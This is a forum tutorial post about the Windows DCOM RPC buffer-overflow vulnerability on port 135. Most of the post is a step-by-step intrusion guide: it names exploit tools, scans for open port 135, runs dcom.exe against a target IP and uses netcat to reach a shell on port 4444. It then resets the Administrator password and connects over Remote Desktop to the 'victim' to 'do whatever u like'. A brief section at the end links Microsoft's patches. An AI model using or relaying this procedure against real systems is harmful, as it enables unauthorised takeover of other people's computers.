Jump to content
SilentPH

What is RPC exploit.

By SilentPH, in Tutoriale in engleza

Recommended Posts

SilentPH Newbie

SilentPH

Posted
Posted

What is RPC exploit.

RPC stands for Remote Procedure Call. The vulnerability lies in the way RPC is implemented in most versions of Windows. The flaw involves the Distributed Component Object Model (DCOM) interface with RPC, which listens on TCP/IP port 135 and other ports. When exploited via those ports, a buffer overflow is created that could allow remote attackers to run commands with the highest system privileges.

Operating systems affected

Microsoft Windows NTA® 4.0

Microsoft WindowsA® 2000

Microsoft Windows XP

Microsoft Windows Server 2003

NOTE: Microsoft Windows Millennium, 95, 98, 98 SE are not affected.

Tools to use.

Well, there are many programs out there for u to download and use for attack. Lets see some:

Angry Ip Scanner (in our "Scanners" download section)

dcom.exe (download the one for ur need here )

nc.exe (in our "Scanners" download section)

RPC Exploit GUI v2 here

How to use them.

Angry Ip Scanner: First of all, open Angry Ip Scanner and scan an ip range for 135 port.

dcom.exe: U must run it from ur MS-DOS prompt (START ---> Run ---> cmd). Then just type dcom ex. dcom 5 127.0.0.0 (pls note that when u 'll run the dcom.exe it 'll show u which number indicates each OS... in this example i use number 5).

nc.exe: Just run nc.exe (from ur MS-DOS prompt again) and type nc 4444 (pls note that nc might be nc***... jst use its name or rename it to nc). Now type in net user Administrator (choose ur own pass). So, if everything went right, go to ur START ---> run ---> mstsc and just type in ur victim's ip and press connect. When connected, do whatever u like.

RPC Exploit GUI v2: Not much to say excepts that works fine (ur antivirus might get this as infected or as Hacktool (read "Antiviruses" in tutorials section). Much more easier than the whole procedure describe above.

Howto protect ur self

Microsoft offers a freely downloadable patch for this vulnerability. Its available at:

Windows NT

Cod:

http://download.microsoft.com/download/6/5/1/651c3333-4892-431f-ae93-bf8718d29e1a/Q823980i.EXE

Windows 2000

Cod:

http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB8239

80-x86-ENU.exe

Windows XP

Cod:

http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980

-x86-ENU.exe

NOTE: If there is a broken link, is not our false. Just visit Microsoft Download Center and search for ur self for the patch or just use the windows live update.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...